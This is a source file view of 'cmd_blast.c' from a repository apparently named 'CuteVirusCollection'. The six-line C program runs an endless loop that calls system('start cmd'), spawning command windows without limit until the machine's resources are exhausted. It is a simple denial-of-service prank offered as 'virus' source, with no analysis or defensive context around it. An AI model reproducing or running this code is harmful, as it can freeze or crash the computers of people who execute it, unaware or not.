Files
CuteVirusCollection/cmd_blast.c
2016-11-16 12:03:58 +06:00

6 lines
59 B
C

main(){
while(1){
system("start cmd");
}
}